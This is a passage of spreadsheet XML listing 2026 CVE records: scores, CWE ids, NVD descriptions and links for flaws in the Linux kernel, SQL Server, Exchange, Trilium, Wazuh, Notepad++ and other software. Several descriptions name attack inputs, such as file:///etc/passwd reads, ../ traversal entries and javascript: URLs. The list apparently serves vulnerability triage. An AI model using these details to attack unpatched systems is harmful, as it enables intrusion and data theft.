      <c r="L1826" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: fix NOREF dst use in seg6 and rpl lwtunnels
seg6_input_core() and rpl_input() call ip6_route_input() which sets a
NOREF dst on the skb, then pass it to dst_cache_set_ip6() invoking
dst_hold() unconditionally.
On PREEMPT_RT, ksoftirqd is preemptible and a higher-priority task can
release the underlying pcpu_rt between the lookup and the caching
through a concurrent FIB lookup on a shared nexthop.
Simplified race sequence:
  ksoftirqd/X                       higher-prio task (same CPU X)
  -----------                       --------------------------------
  seg6_input_core(,skb)/rpl_input(skb)
    dst_cache_get()
      -&gt; miss
    ip6_route_input(skb)
      -&gt; ip6_pol_route(,skb,flags)
         [RT6_LOOKUP_F_DST_NOREF in flags]
        -&gt; FIB lookup resolves fib6_nh
           [nhid=N route]
        -&gt; rt6_make_pcpu_route()
           [creates pcpu_rt, refcount=1]
             pcpu_rt-&gt;sernum = fib6_sernum
             [fib6_sernum=W]
           -&gt; cmpxchg(fib6_nh.rt6i_pcpu,
                      NULL, pcpu_rt)
              [slot was empty, store succeeds]
      -&gt; skb_dst_set_noref(skb, dst)
         [dst is pcpu_rt, refcount still 1]
                                    rt_genid_bump_ipv6()
                                      -&gt; bumps fib6_sernum
                                         [fib6_sernum from W to Z]
                                    ip6_route_output()
                                      -&gt; ip6_pol_route()
                                        -&gt; FIB lookup resolves fib6_nh
                                           [nhid=N]
                                        -&gt; rt6_get_pcpu_route()
                                             pcpu_rt-&gt;sernum != fib6_sernum
                                             [W &lt;&gt; Z, stale]
                                          -&gt; prev = xchg(rt6i_pcpu, NULL)
                                          -&gt; dst_release(prev)
                                             [prev is pcpu_rt,
                                              refcount 1-&gt;0, dead]
    dst = skb_dst(skb)
    [dst is the dead pcpu_rt]
    dst_cache_set_ip6(dst)
      -&gt; dst_hold() on dead dst
      -&gt; WARN / use-after-free
For the race to occur, ksoftirqd must be preemptible (PREEMPT_RT without
PREEMPT_RT_NEEDS_BH_LOCK) and a concurrent task must be able to release
the pcpu_rt. Shared nexthop objects provide such a path, as two routes
pointing to the same nhid share the same fib6_nh and its rt6i_pcpu
entry.
Fix seg6_input_core() and rpl_input() by calling skb_dst_force() after
ip6_route_input() to force the NOREF dst into a refcounted one before
caching.
The output path is not affected as ip6_route_output() already returns a
refcounted dst.</t>
        </is>
      </c>
      <c r="M1826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46099</t>
        </is>
      </c>
    </row>
    <row r="1827">
      <c r="A1827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47231</t>
        </is>
      </c>
      <c r="C1827" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1827" s="5" t="inlineStr"/>
      <c r="F1827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1827" s="5" t="inlineStr"/>
      <c r="H1827" s="5" t="inlineStr"/>
      <c r="I1827" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1827" s="5" t="inlineStr"/>
      <c r="K1827" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L1827" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, `modules/documents-files.php` gates state-changing modes by checking that the actor has `hasUploadRight()` on the URL parameter `folder_uuid`. The `move_save` handler then operates on a *separate* URL parameter `file_uuid` and calls `File::moveToFolder($destFolderUUID)`. `File::moveToFolder()` checks the upload right on the destination folder but never on the source folder containing the file. As a result, any user who can upload to any single folder can move any file from any other folder — including private folders to which they have no view rights — into a folder they control, and then download it. Confidentiality is broken (private file contents leak) and integrity is broken (the file is removed from the original location). Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M1827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47231</t>
        </is>
      </c>
    </row>
    <row r="1828">
      <c r="A1828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47297</t>
        </is>
      </c>
      <c r="C1828" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1828" s="5" t="inlineStr"/>
      <c r="F1828" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1828" s="5" t="inlineStr"/>
      <c r="H1828" s="5" t="inlineStr"/>
      <c r="I1828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1828" s="5" t="inlineStr"/>
      <c r="K1828" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1828" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t>
        </is>
      </c>
    </row>
    <row r="1829">
      <c r="A1829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48081</t>
        </is>
      </c>
      <c r="C1829" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1829" s="5" t="inlineStr"/>
      <c r="F1829" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1829" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1829" s="5" t="inlineStr"/>
      <c r="I1829" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1829" s="5" t="inlineStr"/>
      <c r="K1829" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1829" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, a TENANT_ADMIN can store `javascript:` URLs in the tenant `links` configuration (`website`, `imprint`, `privacyStatement`). These values are returned to the patient-facing landing page via `/api/public`, hydrated into the SvelteKit Button component, and rendered as `&lt;a href="javascript:..."&gt;` elements without URL-scheme filtering. A patient who clicks any such link executes the attacker's JavaScript inside the patient browser origin, where patient form data is read before client-side encryption is applied. This breaks the project's central trust claim that the server is an untrusted relay and that administrators cannot read patient data. Patient-side encryption happens after form input, so JavaScript executing in the patient origin can read or alter the plaintext before encryption is performed. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M1829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48081</t>
        </is>
      </c>
    </row>
    <row r="1830">
      <c r="A1830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50979</t>
        </is>
      </c>
      <c r="C1830" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1830" s="5" t="inlineStr"/>
      <c r="F1830" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G1830" s="5" t="inlineStr"/>
      <c r="H1830" s="5" t="inlineStr"/>
      <c r="I1830" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1830" s="5" t="inlineStr"/>
      <c r="K1830" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1830" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in the 'advanced/curl' component of Osbil Technology oPanel v1.19.50 and earlier allows authenticated attackers to execute arbitrary shell commands via the 'url' parameter</t>
        </is>
      </c>
      <c r="M1830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50979</t>
        </is>
      </c>
    </row>
    <row r="1831">
      <c r="A1831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52521</t>
        </is>
      </c>
      <c r="C1831" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1831" s="5" t="inlineStr"/>
      <c r="F1831" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1831" s="5" t="inlineStr"/>
      <c r="H1831" s="5" t="inlineStr"/>
      <c r="I1831" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1831" s="5" t="inlineStr"/>
      <c r="K1831" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1831" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in Z-BlogPHP 1.7.5 allows authenticated attackers to execute arbitrary SQL commands via the id parameter in the CommentBat feature.</t>
        </is>
      </c>
      <c r="M1831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52521</t>
        </is>
      </c>
    </row>
    <row r="1832">
      <c r="A1832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52793</t>
        </is>
      </c>
      <c r="C1832" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1832" s="5" t="inlineStr"/>
      <c r="F1832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1832" s="5" t="inlineStr"/>
      <c r="H1832" s="5" t="inlineStr"/>
      <c r="I1832" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1832" s="5" t="inlineStr"/>
      <c r="K1832" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1832" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.7, the API authentication path in lib/Froxlor/Api/FroxlorRPC.php and FroxlorRPC::validateAuth accepts an API key and secret for an administrator or customer account without checking type_2fa, validating a TOTP code, or invoking FroxlorTwoFactorAuth. The web interface requires a second factor for accounts with two-factor authentication enabled, but the API grants access after validating only the API credentials, expiration, API permission, and account status. An attacker who obtains an API key and secret for a protected account can call the available API functions without supplying the configured second factor, which can expose or modify customer data, domains, email and FTP accounts, databases, DNS records, and certificate material. This issue is fixed in version 2.3.7.</t>
        </is>
      </c>
      <c r="M1832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52793</t>
        </is>
      </c>
    </row>
    <row r="1833">
      <c r="A1833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53510</t>
        </is>
      </c>
      <c r="C1833" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1833" s="5" t="inlineStr"/>
      <c r="F1833" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1833" s="5" t="inlineStr"/>
      <c r="H1833" s="5" t="inlineStr"/>
      <c r="I1833" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1833" s="5" t="inlineStr"/>
      <c r="K1833" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1833" s="5" t="inlineStr">
        <is>
          <t>Savon is a Ruby SOAP client. From 0.9.8 until 2.17.2, Savon::Model .all_operations interpolates attacker-controlled WSDL operation names into Ruby source passed to module_eval, allowing Ruby code execution in the application process. This issue is fixed in version 2.17.2.</t>
        </is>
      </c>
      <c r="M1833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53510</t>
        </is>
      </c>
    </row>
    <row r="1834">
      <c r="A1834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53580</t>
        </is>
      </c>
      <c r="C1834" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1834" s="5" t="inlineStr"/>
      <c r="F1834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1834" s="5" t="inlineStr"/>
      <c r="H1834" s="5" t="inlineStr"/>
      <c r="I1834" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1834" s="5" t="inlineStr"/>
      <c r="K1834" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-552, CWE-73</t>
        </is>
      </c>
      <c r="L1834" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the automatic image-download feature accepts file:// URLs in a note's img tags and reads the referenced local file with no path validation, allowing any authenticated user to disclose arbitrary files readable by the Trilium process. When a text note is saved, Trilium scans its HTML for image sources and downloads each external one; because the HTML sanitizer keeps file as an allowed scheme, a source such as file:///etc/passwd is passed straight to a filesystem read and its contents are stored as a note attachment the user can then retrieve. Pointing the same primitive at an unbounded source such as /dev/zero causes uncontrolled memory allocation that crashes the server process. The feature is enabled by default and is reachable through the web UI, the ETAPI, the web clipper, and note imports, requiring only an authenticated session or an ETAPI token. This issue is fixed in version 0.104.0</t>
        </is>
      </c>
      <c r="M1834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53580</t>
        </is>
      </c>
    </row>
    <row r="1835">
      <c r="A1835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54083</t>
        </is>
      </c>
      <c r="C1835" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1835" s="5" t="inlineStr"/>
      <c r="F1835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1835" s="5" t="inlineStr"/>
      <c r="H1835" s="5" t="inlineStr"/>
      <c r="I1835" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1835" s="5" t="inlineStr"/>
      <c r="K1835" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1835" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. The  ip-customblock  active response script contains a path traversal vulnerability that lets an attacker create or delete arbitrary files on the filesystem as root. The script builds a file path by concatenating the  srcip  field taken from alert JSON directly onto the fixed  /ipblock/  base directory, without validating that the value is a well-formed IP address. Because the extraction routine returns the raw string unchecked, an attacker who can trigger alert-matching log events with a crafted  srcip  containing  ../  sequences can escape the base directory. The block action opens the resulting path in append mode, creating an empty file at an arbitrary location, while the unblock action passes it to remove(), deleting an arbitrary file; since the active response daemon runs as root, this includes sensitive files such as system credentials and Wazuh configuration. Unlike the sibling scripts host-deny.c, default-firewall-drop.c, and firewalld-drop.c, which reject non-IP input via get_ip_version(), ip-customblock.c omits this validation. This issue is fixed in version 4.14.7.</t>
        </is>
      </c>
      <c r="M1835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54083</t>
        </is>
      </c>
    </row>
    <row r="1836">
      <c r="A1836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54330</t>
        </is>
      </c>
      <c r="C1836" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1836" s="5" t="inlineStr"/>
      <c r="F1836" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1836" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1836" s="5" t="inlineStr"/>
      <c r="I1836" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1836" s="5" t="inlineStr"/>
      <c r="K1836" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1836" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Ceph Object Gateway (RGW) SigV4 handler does not reject requests that carry x-amz-* headers absent from the signed header set, allowing anyone holding a presigned URL to attach arbitrary unsigned x-amz-* headers that RGW will honor. AWS S3 requires every x-amz-* header on a SigV4 request to be signed and rejects requests bearing additional unsigned headers, but RGW validates only the headers listed in X-Amz-SignedHeaders and ignores any extra ones, so they take effect without being covered by the signature. By adding such headers to a presigned PUT URL, an attacker can grant themselves more capabilities than the URL's signer intended and escalate their privileges. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M1836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54330</t>
        </is>
      </c>
    </row>
    <row r="1837">
      <c r="A1837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55007</t>
        </is>
      </c>
      <c r="C1837" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1837" s="5" t="inlineStr"/>
      <c r="F1837" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1837" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1837" s="5" t="inlineStr"/>
      <c r="I1837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1837" s="5" t="inlineStr"/>
      <c r="K1837" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1837" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t>
        </is>
      </c>
    </row>
    <row r="1838">
      <c r="A1838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55065</t>
        </is>
      </c>
      <c r="C1838" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1838" s="5" t="inlineStr"/>
      <c r="F1838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1838" s="5" t="inlineStr"/>
      <c r="H1838" s="5" t="inlineStr"/>
      <c r="I1838" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1838" s="5" t="inlineStr"/>
      <c r="K1838" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L1838" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.24.6 until 2.4.0, DELETE /api/v1/projects/:project/views/:view permits an authenticated user to supply a view identifier from another project while authorizing only against an attacker-controlled project identifier. ProjectView.CanDelete in pkg/models/project_view_permissions.go does not establish that the view belongs to the path project, and ProjectView.Delete in pkg/models/project_view.go continues after the scoped project_views delete affects no rows. Its subsequent deletes select task_buckets and task_positions only by project_view_id, allowing cross-tenant destruction of Kanban assignments and ordering while leaving the victim view and tasks intact. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M1838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55065</t>
        </is>
      </c>
    </row>
    <row r="1839">
      <c r="A1839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55228</t>
        </is>
      </c>
      <c r="C1839" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1839" s="5" t="inlineStr"/>
      <c r="F1839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1839" s="5" t="inlineStr"/>
      <c r="H1839" s="5" t="inlineStr"/>
      <c r="I1839" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1839" s="5" t="inlineStr"/>
      <c r="K1839" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1839" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, the REST API did not properly enforce the scope of project- and workspace-scoped teams, allowing a user to submit invalid team configurations through the API. By assigning projects to a team via these unvalidated requests, a user could grant access to projects they were not authorized to see or manage. This could expose private projects and permit translation, repository, and project-management operations outside the user's intended permission scope. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M1839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55228</t>
        </is>
      </c>
    </row>
    <row r="1840">
      <c r="A1840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57233</t>
        </is>
      </c>
      <c r="C1840" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1840" s="5" t="inlineStr"/>
      <c r="F1840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1840" s="5" t="inlineStr"/>
      <c r="H1840" s="5" t="inlineStr"/>
      <c r="I1840" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1840" s="5" t="inlineStr"/>
      <c r="K1840" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1840" s="5" t="inlineStr">
        <is>
          <t>Notepad++ is a free and open-source source code editor. Prior to 8.9.7, the WinGup decompress function joins untrusted ZIP entry names to unzipDestTo without canonical containment validation, allowing an entry such as ../mimeTools/mimeTools.dll to overwrite a DLL in a sibling plugin directory and execute attacker-controlled code when Notepad++ next loads that plugin. This issue is fixed in version 8.9.7.</t>
        </is>
      </c>
      <c r="M1840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57233</t>
        </is>
      </c>
    </row>
    <row r="1841">
      <c r="A1841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61641</t>
        </is>
      </c>
      <c r="C1841" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1841" s="5" t="inlineStr"/>
      <c r="F1841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1841" s="5" t="inlineStr"/>
      <c r="H1841" s="5" t="inlineStr"/>
      <c r="I1841" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1841" s="5" t="inlineStr"/>
      <c r="K1841" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1841" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. From version 4.0.0 to before version 4.9.6, Wallos's OIDC login links an incoming OIDC identity to an existing local account by matching the email claim alone, without verifying that the IdP marked that email as verified (email_verified). When Wallos is configured against an IdP that lets a user present an arbitrary or unverified email (multi-tenant IdPs, IdPs with open self-registration, or any IdP the attacker partly controls), an attacker with no Wallos account can authenticate with the admin's email and be logged in as the admin — full account takeover, no password needed. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61641</t>
        </is>
      </c>
    </row>
    <row r="1842">
      <c r="A1842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61699</t>
        </is>
      </c>
      <c r="C1842" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1842" s="5" t="inlineStr"/>
      <c r="F1842" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1842" s="5" t="inlineStr"/>
      <c r="H1842" s="5" t="inlineStr"/>
      <c r="I1842" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1842" s="5" t="inlineStr"/>
      <c r="K1842" s="5" t="inlineStr">
        <is>
          <t>CWE-299, CWE-672</t>
        </is>
      </c>
      <c r="L1842" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.7.1, revocation is the only in-band mechanism that isolates a compromised/offboarded host from a Nebula mesh. Because the blocklist never reaches any peer's config.yml, a Blocked host retains full overlay reachability to every peer under its CA (and internal services on the mesh) for up to 30d (agent) / 365d (mobile). An attacker who exfiltrates host.key+host.crt can run stock slackhq/nebula directly, ignore the agent's 403/410 poll responses, and stay connected after the operator revokes the host. Operator-visible state (UI shows blocked, audit log records it) is misleading. This issue has been patched in version 0.7.1.</t>
        </is>
      </c>
      <c r="M1842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61699</t>
        </is>
      </c>
    </row>
    <row r="1843">
      <c r="A1843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62667</t>
        </is>
      </c>
      <c r="C1843" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1843" s="5" t="inlineStr"/>
      <c r="F1843" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1843" s="5" t="inlineStr"/>
      <c r="H1843" s="5" t="inlineStr"/>
      <c r="I1843" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1843" s="5" t="inlineStr"/>
      <c r="K1843" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1843" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, the Grav API plugin ApiKeyManager::generateKey() stores a declared scopes array, but ApiKeyAuthenticator::authenticate() does not read keyData[scopes] and returns the owning user's complete identity. AbstractApiController::requirePermission() consequently evaluates the full user ACL, so a key issued for a read-only scope can perform every write, delete, and administrative operation available to the owner. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M1843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62667</t>
        </is>
      </c>
    </row>
    <row r="1844">
      <c r="A1844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64665</t>
        </is>
      </c>
      <c r="C1844" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1844" s="5" t="inlineStr"/>
      <c r="F1844" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1844" s="5" t="inlineStr"/>
      <c r="H1844" s="5" t="inlineStr"/>
      <c r="I1844" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1844" s="5" t="inlineStr"/>
      <c r="K1844" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="L1844" s="5" t="inlineStr">
        <is>
          <t>Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.74.1 and 6.24.0, when OAuth login was enabled with a provider that does not guarantee verified email addresses, an unauthenticated attacker could sign in as an existing user, potentially including a super admin, without knowing that user's password, because the application matched OAuth identities to accounts by email address alone. Exploitation requires OAuth to be explicitly enabled with such a provider. This issue is fixed in versions 5.74.1 and 6.24.0.</t>
        </is>
      </c>
      <c r="M1844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64665</t>
        </is>
      </c>
    </row>
    <row r="1845">
      <c r="A1845" s="5" t="inlineStr">
        <is>
